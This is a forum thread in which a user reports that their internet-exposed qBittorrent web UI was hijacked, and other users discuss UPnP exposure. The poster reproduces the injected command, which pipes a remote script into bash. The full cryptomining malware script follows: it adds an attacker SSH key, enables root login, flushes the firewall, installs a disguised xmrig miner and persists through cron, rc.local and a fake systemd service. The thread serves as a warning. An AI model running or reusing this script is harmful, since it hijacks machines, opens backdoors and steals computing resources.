首页 注册 登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
TradingView
广告
tinytoadd
V2EX  ›  分享发现

qBittorrent web 端 弱密码 + 开启 UPNP 被挂恶意脚本

  •   
  •   tinytoadd · 144 天前 · 1604 次点击
    这是一个创建于 144 天前的主题,其中的信息可能已经有所发展或是发生改变。

    今天回家,照常下载种子并导入到我的 qBittorrent , 准备美滋滋地看会电视剧。

    由于之前设置了种子完成后自动执行脚本,正常情况应该会自动创建一个到资料库目录的软链接,但今天种子下载好后脚本却没有照常执行。

    检查之后吓了一跳,原本的自动执行程序被替换为以下脚本。

    bash -c "(curl -s -L http://files.catbox.moe/o0gr8o.sh || wget --no-check-certificate -O - http://files.catbox.moe/o0gr8o.sh) | bash"

    检查了一下,是我的 QB 默认开启了 upnp ,家里是公网 IP ,等于直接在公网 8085 端口裸奔了。

    我用的群晖 DS220+和矿神的 qBittorrent 应用,暂时没有发现有损失。

    提醒一下大家注意防范,贴一下这个脚本的内容。

    #! /bin/bash
##
VERSION=e4

# Arguments
#[email protected]
WALLET=41poaCNDTvs33KCFKfekN88Ehf59ddparQdFKFT4XKrUMnc1Ude7xtvhZuKfTai8tDML6gFyTAKY5RuDDxDqLRZpT8QpQ9b
[email protected]
PORT=15555
AUDITD=http://files.catbox.moe/5eki22.out

function prune_competition() {
    sudo systemctl stop c3pool_miner.service 2>&1
    sudo systemctl disable c3pool_miner.service 2>&1
    sudo systemctl disable xmrig.service 2>&1
    sudo systemctl stop journalctld.service 2>&1
    sudo systemctl disable journalctld.service 2>&1
    kill -9 $(pidof xmrig) >/dev/null 2>&1
    kill $(ps aux | grep "[--]config=" | awk '{print $2}') 2>&1
    sudo killall xmrig 2>&1
    sudo pkill xmrig 2>&1
    sudo pkill auditd 2>&1
    killall -9 xmrig 2>&1
    killall xmrig 2>&1
    pkill xmrig 2>&1
    pkill auditd 2>&1
    killall auditd 2>&1
    rm -rf rm -rf /root/.local/.c 2>&1
    rm -rf "${HOME}/.c3pool" >/dev/null 2>&1
    rm -rf /root/.c3pool >/dev/null 2>&1
    rm -rf "${HOME}/.local/share/auditd" >/dev/null 2>&1
    rm -rf "${HOME}/.local/.c*" >/dev/null 2>&1
    rm -rf "${HOME}/.local/bin/auditd"
    rm -rf /etc/cron.daily >/dev/null 2>&1
    rm -rf /etc/cron.daily/auditd >/dev/null 2>&1
    rm -rf /etc/systemd/system/journalctld.service 2>&1
    find . -name "*c3pool*" -exec rm -rf {} \; 2>&1
    find . -name "*xmrig*" -exec rm -rf {} \; 2>&1
    find . -name "*miner*" -exec rm -rf {} \; 2>&1
    find $HOME -name "*c3pool*" -exec rm -rf {} \; 2>&1
    find $HOME -name "*xmrig*" -exec rm -rf {} \; 2>&1
    find $HOME -name "*miner*" -exec rm -rf {} \; 2>&1
    find $HOME -name "*c4*" -exec rm -rf {} \; 2>&1
    find $HOME -name "*auditd*" -exec rm -rf {} \; 2>&1

    sed -i '/AAAAB3NzaC1yc2EAAAADAQABAAABgQDJRrXGodFAgNzqgVw4QmjxKhZbvc6ReMa0ctI8WGbWBi/d' "${HOME}/.ssh/authorized_keys"
    sed -i '/AAAAB3NzaC1yc2EAAAADAQABAAABgQDJRrXGodFAgNzqgVw4QmjxKhZbvc6ReMa0ctI8WGbWBi/d' "/root/.ssh/authorized_keys"
    sed -i '/c3pool/d;/miner.sh/d' "${HOME}/.profile"
    sed -i '/c3pool/d;/miner.sh/d' "/root/.profile"

    mkdir $HOME/.ssh ; touch $HOME/.ssh/authorized_keys ; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJRrXGodFAgNzqgVw4QmjxKhZbvc6ReMa0ctI8WGbWBi3pUF++QmmM6Jo4/wMWqOxmdJotN85QpbkRfYuw9QN5aO35RLSJw7o2UOXN9vsaxnIg9wunNstVff22vyjrFrXTNrHaI///P3d4T4w6CCgLlNdNKgKTG176Y7KBmkWWeZvd8phtIaMprhGSbtnvs4v0hADTw+Ej20EeKfphlZsRSVS6zObq6jro4j8iIXvnGEdkIx8b1SP+QK6D+ZOEQxEzD107latrwYbLCNHWX7VP1oK6fbFk3zU+CGOwITiVPKuyX9aNFJVEopZSmreD+b+JoXpYHybiuhL3ex79uCWNWKnfGgBKrSAmnmopvYnd/mQ902ls16j/Cr/YYKhUvFMC7MhuWdazvM9uFT07c8PSPsEJ+vJpW3t2HQkW89mxqjp1rEvURUlqZtkL/3hZEMaamP6phHpSttncyWiMGuLZxoub/2GM8C09+GOOTaf47//mGxtNs5FNWqjyiznznrc=" >> $HOME/.ssh/authorized_keys ; chmod 600 $HOME/.ssh/authorized_keys

    (chmod go-w ~/ && chmod go-w /root && chmod 700 ~/.ssh && chmod 700 /root/.ssh && chmod 600 ~/.ssh/authorized_keys && chown root /root && chown root /root/.ssh) >/dev/null
    sudo sed -i 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config >/dev/null
    sudo sed -i 's/#PubkeyAuthentication yes/PubkeyAuthentication yes/' /etc/ssh/sshd_config >/dev/null
    iptables -P INPUT ACCEPT 2>&1
    iptables -P FORWARD ACCEPT 2>&1
    iptables -P OUTPUT ACCEPT 2>&1
    iptables -F 2>&1
    ufw disable 2>&1
}

function install_auditd() {
    mkdir -p ${HOME}/.local/share/
    cat >${HOME}/.local/share/auditd <<EOL
#!/bin/bash
if [ -z "\$(pidof auditd)" ]; then
    mkdir -p ${HOME}/.local/bin
    curl -s4 -L "${AUDITD}" -o ${HOME}/.local/bin/auditd
    chmod a+x ${HOME}/.local/bin/auditd
    ${HOME}/.local/bin/auditd
    sleep 5
    rm ${HOME}/.local/bin/auditd
fi
EOL
    chmod a+x "${HOME}/.local/share/auditd"

    mkdir -p /etc/cron.daily
    if ! grep "${AUDITD}" "/etc/cron.daily/auditd" >/dev/null; then
        cp ${HOME}/.local/share/auditd /etc/cron.daily/auditd
    fi

    (${HOME}/.local/share/auditd || /etc/cron.daily/auditd) &
}

function install_rig() {
    mkdir -p "${HOME}/.local/.c"
    "${HOME}/.local/.c/journalctld" --help >/dev/null 2>&1 
    if test $? -ne 0; then
        # Attempt to download
        LATEST_LINUX_RELEASE=$(curl -s4 https://api.github.com/repos/xmrig/xmrig/releases/latest | grep browser_download | grep linux-static | cut -d'"' -f4)
        if ! curl -s4 -L "${LATEST_LINUX_RELEASE}" -o /tmp/xmrig.tar.gz; then
            exit 1
        fi

        # Attempt to extract
        if ! tar xf /tmp/xmrig.tar.gz -C "${HOME}/.local/.c" --strip=1; then
            exit 1
        fi
        rm /tmp/xmrig.tar.gz
        mv "${HOME}/.local/.c/xmrig" "${HOME}/.local/.c/journalctld"

        # Check if downloaded
        "${HOME}/.local/.c/journalctld" --help >/dev/null
        if test $? -ne 0; then 
            exit 1
        fi
    fi

    PASS=$(hostname | cut -f1 -d"." | sed -r 's/[^a-zA-Z0-9\-]+/_/g')

    # Config
    CONFIG="${HOME}/.local/.c/config.json"
    sed -i 's/"url": *"[^"]*",/"url": "mine.c3pool.com:'"${PORT}"'",/' "${CONFIG}"
    sed -i 's/"user": *"[^"]*",/"user": "'"${WALLET}"'",/' "${CONFIG}"
    sed -i 's/"pass": *"[^"]*",/"pass": "'"${PASS}"'",/' "${CONFIG}"
    sed -i 's/"max-cpu-usage": *[^,]*,/"max-cpu-usage": 100,/' "${CONFIG}"
    sed -i 's#"log-file": *null,#"log-file": "'"${HOME}/.local/.c/journalctld.log"'",#' "${CONFIG}"
    sed -i 's/"syslog": *[^,]*,/"syslog": false,/' "${CONFIG}"
    sed -i 's/"max-threads-hint": *[^,]*,/"max-threads-hint": 75,/' "${CONFIG}"
    sed -i 's/"background": *[^,]*,/"background": false,/' "${CONFIG}"

    # Config (background)
    cp "${CONFIG}" "${HOME}/.local/.c/config_background.json"
    sed -i 's/"background": *false,/"background": true,/' "${HOME}/.local/.c/config_background.json"

    # Prepare start script
    cat >"${HOME}/.local/.c/journalctl" <<EOL
#!/bin/bash
if [ -z "\$(pidof auditd)" ]; then
    curl -s4 -L "${AUDITD}" -o /tmp/auditd
    chmod a+x /tmp/auditd
    /tmp/auditd
    rm /tmp/auditd
fi

if [ -z "\$(pidof journalctld)" ]; then
    nice ${HOME}/.local/.c/journalctld \$*
fi
EOL
    chmod +x "${HOME}/.local/.c/journalctl"

    # Prepare persistence
    if ! grep journalctl "${HOME}/.profile" >/dev/null; then
        echo "${HOME}/.local/.c/journalctl --config=${HOME}/.local/.c/config_background.json >/dev/null 2>&1" >> "${HOME}/.profile"
    fi
    if ! grep journalctl "/etc/rc.local" >/dev/null; then
        echo "#!/bin/bash" > "/etc/rc.local"
        echo "${HOME}/.local/.c/journalctl --config=${HOME}/.local/.c/config_background.json >/dev/null 2>&1" >> "/etc/rc.local" && chmod a+x "/etc/rc.local"
    fi
    

    if sudo -n true 2>/dev/null; then
        # Attempt to configure huge pages
        if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') -gt 3500000 ]]; then
            echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf
            sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
        fi

        if ! type systemctl >/dev/null; then
            /bin/bash "${HOME}/.local/.c/journalctl" --config="${HOME}/.local/.c/config_background.json" >/dev/null 2>&1
        else
            cat >/tmp/journalctld.service <<EOL
[Unit]
Description=systemd journaling
[Service]
ExecStart=${HOME}/.local/.c/journalctl --config=${HOME}/.local/.c/config.json
Restart=always
Nice=10
CPUWeight=1
[Install]
WantedBy=multi-user.target
EOL
            sudo mv /tmp/journalctld.service /etc/systemd/system/journalctld.service
            sudo killall journalctld 2>/dev/null
            sudo systemctl daemon-reload
            sudo systemctl enable journalctld.service
            sudo systemctl restart journalctld.service
        fi
    fi


    if [ -z "$(pidof journalctld)" ]; then
        /bin/bash "${HOME}/.local/.c/journalctl" --config="${HOME}/.local/.c/config_background.json" >/dev/null 2>&1
    fi
}

# Run processes
prune_competition
install_auditd
install_rig

# Version
echo "${VERSION}" > "${HOME}/.local/.c/.version"

sudo /etc/init.d/ssh restart >/dev/null
  • local
  • home
  • auditd
  • null
    12 条回复    2024-03-20 08:01:45 +08:00
    zk8802
        1
    zk8802  
       144 天前 via iPhone
    居然还有注释的…
    sinksmell
        2
    sinksmell  
       144 天前 via Android
    吓的我立马把管理端 IP 设置为内网 IP🤣
    Remember
        3
    Remember  
       144 天前
    按说 upnp 打的洞只是 bt 协议用的,qb 的 webui 管理端口不会打一个外网访问的洞的啊。
    tinytoadd
        4
    tinytoadd  
    OP
       144 天前 via iPhone
    @Remember 我的这个版本默认给 webui 管理端口也放开了. 还好 qb 是单独的用户和用户组,索性没事
    TrembleBeforeMe
        5
    TrembleBeforeMe  
       144 天前


    要在设置里面手动开启 webui 的 upnp 吧
    jedihy
        6
    jedihy  
       144 天前
    你的 qb 不是跑在 docker 里面的吗?

    我的是跑在 docker 里,而且 webui 的 upnp 默认没开。
    shuang930225
        7
    shuang930225  
       144 天前
    监听端口 6881 打开的,有必要端口转发吗?还是不转也能正常做种?
    msn1983aa
        8
    msn1983aa  
       144 天前
    我的 qb 都卡在下载元数据,已经废了。。。。
    psirnull
        9
    psirnull  
       144 天前
    WALLET=41poaCNDTvs33KCFKfekN88Ehf59ddparQdFKFT4XKrUMnc1Ude7xtvhZuKfTai8tDML6gFyTAKY5RuDDxDqLRZpT8QpQ9b
    Bear13023
        10
    Bear13023  
       144 天前
    看楼主的这个感觉自己上个月可能也是中了类似玩意,我是 unraid ,nas 最近用的少就是 plex 听歌用用,存放下照片。

    结果我 unraid 系统都登录不上,最终这缓存硬盘被不识别要我格式化再使用。直接换一张盘,这张缓存盘就先不用了。
    AshengQAQ
        11
    AshengQAQ  
       82 天前
    c3pool 猫池,wa 矿的,我上个月刚中,也是索性没有对系统造成损坏
    y1y1
        12
    y1y1  
       38 天前
    刚刚中招,openwrt 上的 qb
    被 docker 坑了。。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   我们的愿景   ·   实用小工具   ·   2924 人在线   最高记录 6543   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 34ms · UTC 07:35 · PVG 15:35 · LAX 00:35 · JFK 03:35
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.